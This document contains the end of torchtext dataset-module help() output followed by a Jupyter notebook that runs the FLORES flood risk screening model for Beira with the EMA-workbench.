| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class XNLI(NLIDataset)
| XNLI(path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
|
| Defines a Dataset of columns stored in CSV, TSV, or JSON format.
|
| Method resolution order:
| XNLI
| NLIDataset
| torchtext.data.dataset.TabularDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| iters(*args, **kwargs) from builtins.type
| Create iterator objects for splits of the SNLI dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-2
| subdirectory the data files will be stored.
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| trees: Whether to include shift-reduce parser transitions.
| Default: False.
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, label_field, genre_field=None, language_field=None, root='.data', validation='xnli.dev.jsonl', test='xnli.test.jsonl') from builtins.type
| Create dataset objects for splits of the SNLI dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for premise and hypothesis
| data.
| label_field: The field that will be used for label data.
| parse_field: The field that will be used for shift-reduce parser
| transitions, or None to not include them.
| extra_fields: A dict[json_key: Tuple(field_name, Field)]
| root: The root directory that the dataset's zip archive will be
| expanded into.
| train: The filename of the train data. Default: 'train.jsonl'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'dev.jsonl'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'test.jsonl'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'XNLI-1.0'
|
| name = 'xnli'
|
| urls = ['http://www.nyu.edu/projects/bowman/xnli/XNLI-1.0.zip']
|
| ----------------------------------------------------------------------
| Static methods inherited from NLIDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.TabularDataset:
|
| __init__(self, path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
| Create a TabularDataset given a path, file format, and field list.
|
| Arguments:
| path (str): Path to the data file.
| format (str): The format of the data file. One of "CSV", "TSV", or
| "JSON" (case-insensitive).
| fields (list(tuple(str, Field)) or dict[str: tuple(str, Field)]:
| If using a list, the format must be CSV or TSV, and the values of the list
| should be tuples of (name, field).
| The fields should be in the same order as the columns in the CSV or TSV
| file, while tuples of (name, None) represent columns that will be ignored.
|
| If using a dict, the keys should be a subset of the JSON keys or CSV/TSV
| columns, and the values should be tuples of (name, field).
| Keys not present in the input dictionary are ignored.
| This allows the user to rename columns from their JSON/CSV/TSV key names
| and also enables selecting a subset of columns to load.
| skip_header (bool): Whether to skip the first line of the input file.
| csv_reader_params(dict): Parameters to pass to the csv reader.
| Only relevant when format is csv or tsv.
| See
| https://docs.python.org/3/library/csv.html#csv.reader
| for more details.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
FUNCTIONS
AG_NEWS(*args, **kwargs)
Defines AG_NEWS datasets.
The labels includes:
- 1 : World
- 2 : Sports
- 3 : Business
- 4 : Sci/Tech
Create supervised learning dataset: AG_NEWS
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.AG_NEWS(ngrams=3)
AmazonReviewFull(*args, **kwargs)
Defines AmazonReviewFull datasets.
The labels includes:
1 - 5 : rating classes (5 is highly recommended)
Create supervised learning dataset: AmazonReviewFull
Separately returns the training and test dataset
Arguments:
root: Directory where the dataset are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.AmazonReviewFull(ngrams=3)
AmazonReviewPolarity(*args, **kwargs)
Defines AmazonReviewPolarity datasets.
The labels includes:
- 1 : Negative polarity
- 2 : Positive polarity
Create supervised learning dataset: AmazonReviewPolarity
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.AmazonReviewPolarity(ngrams=3)
DBpedia(*args, **kwargs)
Defines DBpedia datasets.
The labels includes:
- 1 : Company
- 2 : EducationalInstitution
- 3 : Artist
- 4 : Athlete
- 5 : OfficeHolder
- 6 : MeanOfTransportation
- 7 : Building
- 8 : NaturalPlace
- 9 : Village
- 10 : Animal
- 11 : Plant
- 12 : Album
- 13 : Film
- 14 : WrittenWork
Create supervised learning dataset: DBpedia
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.DBpedia(ngrams=3)
SogouNews(*args, **kwargs)
Defines SogouNews datasets.
The labels includes:
- 1 : Sports
- 2 : Finance
- 3 : Entertainment
- 4 : Automobile
- 5 : Technology
Create supervised learning dataset: SogouNews
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.SogouNews(ngrams=3)
YahooAnswers(*args, **kwargs)
Defines YahooAnswers datasets.
The labels includes:
- 1 : Society & Culture
- 2 : Science & Mathematics
- 3 : Health
- 4 : Education & Reference
- 5 : Computers & Internet
- 6 : Sports
- 7 : Business & Finance
- 8 : Entertainment & Music
- 9 : Family & Relationships
- 10 : Politics & Government
Create supervised learning dataset: YahooAnswers
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.YahooAnswers(ngrams=3)
YelpReviewFull(*args, **kwargs)
Defines YelpReviewFull datasets.
The labels includes:
1 - 5 : rating classes (5 is highly recommended).
Create supervised learning dataset: YelpReviewFull
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.YelpReviewFull(ngrams=3)
YelpReviewPolarity(*args, **kwargs)
Defines YelpReviewPolarity datasets.
The labels includes:
- 1 : Negative polarity.
- 2 : Positive polarity.
Create supervised learning dataset: YelpReviewPolarity
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.YelpReviewPolarity(ngrams=3)
DATA
__all__ = ['LanguageModelingDataset', 'SNLI', 'MultiNLI', 'XNLI', 'SST...
FILE
c:\programdata\anaconda3\lib\site-packages\torchtext\datasets\__init__.py
|
src/FLORES_dashboard/.ipynb_checkpoints/FLORES Screening - Beira-checkpoint.ipynb | ###Markdown
Flood Risk Reduction Evaluation and ScreeningFLORES is a fast flood risk screening model, aimed at providing useful information early in the decision-making process for flood-prone cities. It simulates and evaluates the impact of many alternative flood risk reduction strategies, each consisting of a combination of measures.Basic formulas are used instead of more complex hydraulic modelling software, to reduce computation time, and to allow the model to run on a personal computer. Multiple flood hazards; Considers multiple flood hazards: coastal flooding, river flooding, and urban flooding. Also storms can be simulated that compound the effects of multiple hazards,Combining structural and non-structural measures; The FLORES model takes various methods of reducing flood risk into account. Including: coastal protection, storm surge barriers, drainage, retention, urban planning, early warning systems,Multiple performance metrics for comparison; As most decisions are not made solely based on economic arguments, flood risk reduction strategies are assessed based on multiple parameters,Multi-purpose evaluation techniques; Early in design, many stakeholders are involved. A wide range of different analysis tools is available, in order to tailor the type of analysis to the specific needs of the user. This can range from finding correlations and trade-offs, to scenario discovery or more sophisticated robust decision making tools. These tools are provided through the use of the EMA-workbench (Kwakkel, 2017),Limited data requirements; Many flood-prone cities are located in regions that lack reliable data. The model focusses on the conceptual design phase, where detailed results are not expected yet. Therefore, it is built to work with widely-available (open) data sets.Generic setup; The FLORES model aims to be used in a wide variety of situations and areas. It is therefore developed as a generic model, consisting of separate modules, where no additional coding is required. The model only requires processing of the local characteristics, partly by using GIS-tools. The FLORES model has been developed at Delft University of Technology, Department of Hydraulic Engineering, in cooperation with GFDRR and the World Bank Group (van Berchum, 2019). Parts of the model have been developed in previous research, in cooperation with Texas A&M University Galveston (van Berchum and Mobley, 2017) This notebook runs through the entire model, including installation, input data, simulation, and several analyses. It requires no previous installation, besides Python 3 and Jupyter Notebook. Throughout the walkthrough, multiple packages will be downloaded, most notably the EMA-workbench.Version FLORES model: 0.3 (first generic version) Version EMA-workbench: 2.1Last Updated: 29-11-2019 1. Download and installation modelHere, we download the main model components:FLORES, available on Github EMA-workbench, available on pip build correct folder structure for analysis: data, figs, Library,(input data folder, FLORES python files) analysis notebook, runner notebook
###Code
#from __future__ import (absolute_import, division, print_function, unicode_literals)
from pathlib import Path
import os
import sys
# never use absolute paths that are system specific unless you
# realy have no other choice
sys.path.append(os.path.abspath('..'))
from ema_workbench import (CategoricalParameter, RealParameter, ScalarOutcome, Constant,
ReplicatorModel, ema_logging, MultiprocessingEvaluator,
save_results)
from FLORES_tools.Library.flood_simulation_model import (FloodSimModel, process_risk, pick_one, process_affected_people, SimulationInput)
from datetime import date
from timeit import default_timer as timer
path_src = os.path.abspath('..')
print(path_src)
###Output
D:\GitHub\FLORES-Beira\src
###Markdown
2. Import model parts for analysis- import all ema-workbench files needed for analysis- import all other packages needed for analysis 3. Import case study data- make a choice of which DEM to use- show DEM, basin structure, layers structure- import .csv files of basins, layers- show+import measures data- show+import all storm data- show+import damage curves- show+import drainage data
###Code
dir_name_data = os.path.join(path_src, 'Projects/FLORES_beira/input_data').replace('\\','/')
print(dir_name_data)
flores_sim = FloodSimModel()
# Make choice for DEM
flores_dem = 'TanDEM'
suffix_dem = '.PNG'
dem_folderpath = os.path.join(dir_name_data, 'schematization/', flores_dem).replace('\\','/')
dem_plotfile = str(os.path.join(dem_folderpath, flores_dem + suffix_dem)).replace('\\','/')
dem_datafolder = os.path.join(dem_folderpath, 'data').replace('\\','/')
###Output
_____no_output_____
###Markdown
City schematizationGIS-based computations are often computationally very demanding. Therefore, the area will be schematized to speed up the simulation. Within the FLORES model, the city will be schematized as a number of drainage basins. A drainage basin is defined as the area where water drains towards the same location, i.e. the lowest point in that specific area. This way, the local topography of the city, with local depressions, is accounted for. The hydraulic simulation of a storm and/or rainfall event revolves around the (connected) volume balances of these drainage basins. This type of simulation has many similarities with other Rapid Flood Inundation Models (RFIM) as proposed by Shen et al. (2016), Liu and Pender (2010) and Lhomme et al. (2008). In the FLORES Flood simulation, this volume balance is expanded by taking into account rainfall, infiltration, drainage, retention and surface flow between drainage basins.Moreover, when a city is also threatened by storm surge, lines of defense (e.g. coastline, riverbank) are also defined and the water flowing across such a line of defense is modelled as inflow for the affected drainage basins. This volume balance will be repeated for each basin and for every timestep throughout the flood event.
###Code
# Show schematization
suffix_plot = '.PNG'
suffix_data = '.csv'
basin_plotfile = str(os.path.join(dem_folderpath, flores_dem + '_basins' + suffix_plot)).replace('\\','/')
LOD_plotfile = str(os.path.join(dem_folderpath, flores_dem + '_lines_of_defense' + suffix_plot)).replace('\\','/')
basin_datafile = str(os.path.join(dem_datafolder, flores_dem + '_basins' + suffix_data)).replace('\\','/')
LOD_datafile = str(os.path.join(dem_datafolder, flores_dem + '_lines_of_defense' + suffix_data)).replace('\\','/')
basin_borders_datafile = str(os.path.join(dem_datafolder, flores_dem + '_basin_borders' + suffix_data)).replace('\\','/')
basin_drainage_datafile = str(os.path.join(dem_datafolder, flores_dem + '_basin_drainage' + suffix_data)).replace('\\','/')
flores_sim.save_source('basins', basin_datafile)
flores_sim.save_source('layers', LOD_datafile)
flores_sim.save_source('basin_borders', basin_borders_datafile)
flores_sim.save_source('basin_drainage', basin_drainage_datafile, 'yes')
###Output
_____no_output_____
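###Markdown
For illustration only, the cell below sketches the kind of per-basin volume balance described above; it is a simplified stand-alone example with made-up numbers and names, not the actual FLORES implementation (which lives in the FLORES_tools library imported earlier).
###Code
# Hypothetical sketch of a rapid-flood-model volume balance (illustration only, not FLORES source code).
import numpy as np

n_basins, n_steps, dt = 3, 48, 3600.0           # number of basins, time steps, step size [s]
area = np.array([2.0e6, 1.5e6, 3.0e6])          # basin surface area [m2] (made up)
volume = np.zeros(n_basins)                     # stored flood volume per basin [m3]
rain = np.full((n_steps, n_basins), 5.0e-6)     # rainfall rate [m/s] (constant in this sketch)
infiltration = 1.0e-6                           # infiltration rate [m/s]
drain_cap = np.array([2.0, 1.0, 3.0])           # drainage capacity per basin [m3/s]
inflow_lod = np.zeros((n_steps, n_basins))      # inflow across a line of defense [m3/s]

for t in range(n_steps):
    # sources: rainfall on the basin area plus any inflow over the line of defense
    volume += (rain[t] * area + inflow_lod[t]) * dt
    # sinks: infiltration and drainage, bounded by the volume that is actually available
    volume -= np.minimum(volume, (infiltration * area + drain_cap) * dt)
    # surface flow between neighbouring basins would be exchanged here, based on water levels

depth = volume / area                           # simple flat-water inundation depth [m]
###Output
_____no_output_____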
###Markdown
ExposureThe impact calculation is based on people and structures exposed to inundation caused by the storm. There is spatial data available on population and structural value. By combining this data with the DEM, csv-datafiles are built containing population numbers and structural value for individual drainage basins, and for different elevation levels within.
###Code
pop_source = 'ADFR_pop'
str_source = 'ADFR_str'
folder_exposure = 'exposure'
suffix_plot = '.tif'
suffix_data = '.csv'
exposure_folderpath = os.path.join(dem_datafolder, folder_exposure).replace('\\','/')
pop_folder = os.path.join(exposure_folderpath,pop_source).replace('\\','/')
str_folder = os.path.join(exposure_folderpath, str_source).replace('\\','/')
pop_plotfile = str(os.path.join(pop_folder, pop_source + suffix_plot)).replace('\\','/')
structures_plotfile = str(os.path.join(str_folder, str_source + '.png')).replace('\\','/')
pop_datafile = str(os.path.join(pop_folder, pop_source + suffix_data)).replace('\\','/')
str_datafile = str(os.path.join(str_folder, str_source + suffix_data)).replace('\\','/')
flores_sim.save_source('population', pop_datafile)
flores_sim.save_source('structures', str_datafile, 'yes')
###Output
_____no_output_____
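###Markdown
As an illustration of what these exposure tables contain, the sketch below aggregates hypothetical gridded population counts by drainage basin and elevation level; the real csv files are produced beforehand from the GIS data referenced above, so every number in this cell is made up.
###Code
# Hypothetical sketch: bin gridded population by basin and elevation level (illustration only).
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
cells = pd.DataFrame({
    'basin': rng.integers(1, 4, size=1000),             # basin id of each grid cell (made up)
    'elevation': rng.uniform(0.0, 10.0, size=1000),     # cell elevation from a DEM [m] (made up)
    'population': rng.poisson(5, size=1000),            # people per grid cell (made up)
})
cells['elevation_level'] = pd.cut(cells['elevation'], bins=np.arange(0, 11, 1))
exposure_table = (cells.groupby(['basin', 'elevation_level'])['population']
                       .sum()
                       .unstack(fill_value=0))          # rows: basins, columns: elevation levels
###Output
_____no_output_____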
###Markdown
The damage to exposed structures is measured with the use of damage curves. These curves give the amount of damage as a result of a given inundation depth. Damage curves are available for different land use types. Please note that these figures are used to calculate the expected value of structural damage. The number of people affected uses a simplified definition, where a person is 'affected' when the water level in the residence rises above 10 cm.
###Code
dam_curve_source = "damage_curves_JRC"
suffix_dam_curve = ".xlsx"
dam_curve_file = str(os.path.join(dir_name_data, 'schematization/' + dam_curve_source + suffix_dam_curve)).replace('\\','/')
flores_sim.save_source('damage_curves', dam_curve_file, 'yes')
print(dam_curve_file)
###Output
D:/GitHub/FLORES-Beira/src/Projects/FLORES_beira/input_data/schematization/damage_curves_JRC.xlsx
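###Markdown
A minimal sketch of how a depth-damage curve and the 10 cm 'affected' threshold can be applied is shown below; the curve points are invented for illustration, whereas the model itself reads its curves from the xlsx file loaded above.
###Code
# Hypothetical sketch of applying a depth-damage curve (illustration only).
import numpy as np

depth_points = np.array([0.0, 0.5, 1.0, 2.0, 4.0])         # inundation depth [m] (made up)
damage_fraction = np.array([0.0, 0.25, 0.40, 0.60, 0.85])  # fraction of structural value lost (made up)

def structural_damage(inundation_depth, structural_value):
    # interpolate the damage fraction for the given depth and scale by the exposed value
    return np.interp(inundation_depth, depth_points, damage_fraction) * structural_value

def people_affected(inundation_depth, population, threshold=0.10):
    # a person counts as 'affected' once the water depth exceeds the 10 cm threshold
    return np.asarray(population) * (np.asarray(inundation_depth) > threshold)

example_damage = structural_damage(0.75, 1.0e6)             # damage for 0.75 m of water on 1M worth of structures
example_affected = people_affected([0.05, 0.30], [100, 200])
###Output
_____no_output_____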
###Markdown
Flood risk reduction measures A flood risk reduction strategy consists of a combination of potential measures. In order to represent the full array of options for flood risk management, many different types of measures are included. Measures can affect different parts of the model. table, th, td { border: 1px solid black; border-collapse: collapse;}th, td { padding: 5px; text-align: left; } Type Measure Location Costs Remarks Coastal structures Coastal dike - East Eastern coast 2 million USD Possible heights: 7.0;7.5;8.0;8.5;9.0;9.5 m Coastal dike - West Western coast 4 million USD Coastal dunes - East Eastern coast 4 million USD Floodwall - West Western coast 4 million USD Coastal dike - West Western coast 4 million USD Coastal dike - West Western coast 4 million USD First, we will run a single simulation to look at its effects. Therefore, it is necessary to choose a strategy, consisting of a combination of flood risk reduction measures. Below, all locations where measures can be placed are listed. The options are listed at the appropriate location and correspond to the measures in the table above.
###Code
measures_source = 'flood_risk_reduction_measures_'
suffix_measures_data = '.csv'
measures_datafile = str(os.path.join(dir_name_data,'measures/' + measures_source + flores_dem + suffix_measures_data)).replace('\\','/')
flores_sim.save_source('measures', measures_datafile, 'yes')
flores_sim.define_active_measures(CD_1=True,
CD_2=True,
CD_3=True,
CD_4=True,
SM_1=True,
DR_1=True,
DR_2=True,
RT_1=True,
RT_2=True,
EM_1=True,
EM_2=True
)
###Output
_____no_output_____
###Markdown
Import storm dataThe simulation is centered around the effects of an incoming storm. In the current FLORES model, it is possible to take into account the effects of coastal storm surge and extreme rainfall. These hazards can occur separately or together, as would be the case during a cyclone event. The severity of the storm is measured in the return period of the underlying hazard. For example, a cyclone can lead to 100-year storm surge and a 10-year rainfall event. Coastal storm surge is simulated in the form of a time series of water levels along the coast. All transitioning from deep sea to nearshore conditions is done beforehand. The length of the storm can vary. As time series of storms are often scarce, time series of historic events are scaled, depending on the highest reached water levels.Rainfall is much more variable, as each rainfall event can show a totally different time series of rainfall intensity. It is therefore unnecessary and unrealistic to base time series on past events, which is why a constant time series will be used. When no information is available about local hotspots that receive significantly higher amounts of rainfall, the spatial distribution is also constant. By choosing a source and plotting the result, you can see the rainfall duration-intensity curves and the 100-year storm surge time series.
###Code
rain_source = 'study_chiveve'
ss_source = 'SS'
folder_hazard = 'hazards'
suffix_plot = '.jpg'
suffix_data = '.csv'
hazard_folderpath = os.path.join(dir_name_data, folder_hazard).replace('\\','/')
rain_plotfile = str(os.path.join(hazard_folderpath,'rainfall_' + rain_source + suffix_plot)).replace('\\','/')
ss_plotfile = str(os.path.join(hazard_folderpath, 'surge_' + ss_source + suffix_plot)).replace('\\','/')
rain_datafile = str(os.path.join(hazard_folderpath, 'rainfall_' + rain_source + suffix_data)).replace('\\','/')
ss_datafile = str(os.path.join(hazard_folderpath, 'surge_' + ss_source + suffix_data)).replace('\\','/')
flores_sim.save_source('hazard_rain', rain_datafile)
flores_sim.save_source('hazard_surge', ss_datafile, 'yes')
###Output
_____no_output_____
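###Markdown
The scaling of a historic surge time series to a chosen return period, and the constant rainfall intensity, can be illustrated with the sketch below; all peak levels and intensities are invented, since the model reads its hazard input from the csv files loaded above.
###Code
# Hypothetical sketch: scale a normalised surge hydrograph and build a constant rainfall series (illustration only).
import numpy as np

hours = np.arange(48)
normalised_surge = np.exp(-((hours - 24) / 8.0) ** 2)        # historic storm shape, scaled so its peak equals 1

peak_level = {5: 1.2, 10: 1.6, 50: 2.3, 100: 2.7}            # peak surge level per return period [m] (made up)
rain_intensity = {5: 8.0, 10: 12.0, 50: 20.0, 100: 25.0}     # rainfall intensity per return period [mm/h] (made up)

return_period_surge = 100
return_period_rain = 10

surge_series = peak_level[return_period_surge] * normalised_surge        # scaled surge time series
rain_series = np.full(hours.shape, rain_intensity[return_period_rain])   # constant-intensity rainfall series
###Output
_____no_output_____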
###Markdown
Future scenariosThe change of a city over time can greatly affect the impact of implementing flood risk reduction measures. Likewise, changes to hazard intensity - due to climate change - can greatly change the situation. It is therefore crucial to look at flood risk reduction in the context of changing circumstances and a changing city. Exploring many possible futures, in order to find the strategy that performs well across all of them, is at the heart of Robust Decision Making. With the use of the screening tool and analysis tools provided by the EMA-workbench, it is possible to pursue robust solutions.In this case study, only the effects of climate change can be altered, in order to see their effect on the risk profile. Urban development is also added to the model. However, because it is connected to land use types, which don't vary much throughout the city, varying the urban development predictions provides no new information.
###Code
climate_source = 'IPCC'
urban_source = 'GOV'
folder_scenarios = 'scenarios'
suffix_scenarios_data = '.csv'
scenarios_folderpath = os.path.join(dir_name_data, folder_scenarios).replace('\\','/')
climate_scenarios_data = str(os.path.join(scenarios_folderpath,'climate_' + climate_source + suffix_scenarios_data)).replace('\\','/')
urban_scenarios_data = str(os.path.join(scenarios_folderpath, 'urban_dev_' + urban_source + suffix_scenarios_data)).replace('\\','/')
flores_sim.save_source('climate_scenarios', climate_scenarios_data)
flores_sim.save_source('urban_development_scenarios', urban_scenarios_data, 'yes')
###Output
All sources defined. Importing datasets.
###Markdown
4 Screen flood risk reduction strategies- make a choice on the number of storms to use, which measures to compare, and how many strategies to compare- Run model
###Code
ema_logging.log_to_stderr(level=ema_logging.INFO)
flores_screen = ReplicatorModel('Beira', function=flores_sim.screening_simulation_model)
flores_screen.replications = [{"return_period_rainfall": 100, "return_period_storm_surge": 100},
{"return_period_rainfall": 50, "return_period_storm_surge": 100},
{"return_period_rainfall": 10, "return_period_storm_surge": 100},
{"return_period_rainfall": 5, "return_period_storm_surge": 100},
{"return_period_rainfall": 0, "return_period_storm_surge": 100},
{"return_period_rainfall": 100, "return_period_storm_surge": 50},
{"return_period_rainfall": 50, "return_period_storm_surge": 50},
{"return_period_rainfall": 10, "return_period_storm_surge": 50},
{"return_period_rainfall": 5, "return_period_storm_surge": 50},
{"return_period_rainfall": 0, "return_period_storm_surge": 50},
{"return_period_rainfall": 100, "return_period_storm_surge": 10},
{"return_period_rainfall": 50, "return_period_storm_surge": 10},
{"return_period_rainfall": 10, "return_period_storm_surge": 10},
{"return_period_rainfall": 5, "return_period_storm_surge": 10},
{"return_period_rainfall": 0, "return_period_storm_surge": 10},
{"return_period_rainfall": 100, "return_period_storm_surge": 5},
{"return_period_rainfall": 50, "return_period_storm_surge": 5},
{"return_period_rainfall": 10, "return_period_storm_surge": 5},
{"return_period_rainfall": 5, "return_period_storm_surge": 5},
{"return_period_rainfall": 0, "return_period_storm_surge": 5},
{"return_period_rainfall": 100, "return_period_storm_surge": 0},
{"return_period_rainfall": 50, "return_period_storm_surge": 0},
{"return_period_rainfall": 10, "return_period_storm_surge": 0},
{"return_period_rainfall": 5, "return_period_storm_surge": 0},
{"return_period_rainfall": 'INFO', "return_period_storm_surge": 'INFO'}]
leverlist = []
structural_measures = {}
structural_locations = {}
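# Non-structural measures become simple on/off levers below; structural measures are first
# grouped by location, so that each location gets one categorical lever choosing which
# structure to build there (or 'none') plus a continuous lever for its height.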
for measure in flores_sim.AllMeasures:
if flores_sim.AllMeasures[measure].Type == 'Structural':
structural_measures[measure] = flores_sim.AllMeasures[measure].Location
else:
leverlist.append(CategoricalParameter(measure, [True, False]))
for measure, location in structural_measures.items():
if location not in structural_locations:
structural_locations[location] = [measure]
else:
structural_locations[location].append(measure)
for location in structural_locations:
structural_locations[location].append('none')
leverlist.append(CategoricalParameter('structure-' + location, structural_locations[location]))
first_measure = structural_locations[location][0]
leverlist.append(RealParameter('height-' + location, flores_sim.AllMeasures[first_measure].StructureHeights[0],
flores_sim.AllMeasures[first_measure].StructureHeights[-1]))
flores_screen.levers = leverlist
flores_screen.constants = [Constant('urban_development_scenario', 'low')]
flores_screen.uncertainties = [CategoricalParameter('climate_scenario', ['low', 'high'])]
flores_screen.outcomes = [ScalarOutcome("risk_reduction", function=process_risk),
ScalarOutcome("construction_costs", function=pick_one),
ScalarOutcome("affected_pop_reduction", function=process_affected_people)]
nr_strategies = 500
today = date.today()
fn = ('Projects/FLORES_beira/data/{0} experiments_FLORES_{1}_{2}_tandem_trapz.tar.gz'.format(nr_strategies, 'Beira', today))
print('ready for screening')
###Output
ready for screening
###Markdown
run screening*warning, this may take several hours to run. If you want to analyze a previous screening, skip this block*
###Code
path_fn = os.path.join(path_src, fn).replace('\\','/')
print(path_fn)
if not os.path.exists(path_fn):
start = timer()
#with SequentialEvaluator(flores_screen) as evaluator:
with MultiprocessingEvaluator(flores_screen, n_processes=8) as evaluator:
results = evaluator.perform_experiments(scenarios=2, policies=nr_strategies,
uncertainty_sampling='ff', reporting_interval=1)
save_results(results, path_fn)
print("done")
end = timer()
print(end - start)
###Output
D:/GitHub/FLORES-Beira/src/Projects/FLORES_beira/data/500 experiments_FLORES_Beira_2019-11-29_tandem_trapz.tar.gz
###Markdown
5 Flood Risk AnalysisWith the use of the screening tool, many flood risk reduction strategies have been simulated. Next, we will use a selection of tools to analyze the results.First, we will list all previous screening runs. If you want to view the results, copy the string into the code cell below at: str_path_results = str(data_directory.joinpath(*insert string here*))
###Code
from os import listdir
from matplotlib import pyplot
# path_src (defined above) is a plain string, so wrap it in a Path before using the / operator
data_directory = Path(path_src) / 'Projects' / 'FLORES_beira' / 'data'
listdir(data_directory)
from ema_workbench import load_results
#str_path_results = str(data_directory.joinpath('25 experiments_FLORES_Beira_2019-11-16.tar.gz'))
#results = load_results(str_path_results)
experiments, outcomes = results
print(experiments.shape)
print(list(outcomes.keys()))
from ema_workbench.analysis import pairs_plotting
fig, axes = pairs_plotting.pairs_scatter(experiments, outcomes, group_by='policy',
legend=False)
fig.set_size_inches(8,8)
pyplot.show()
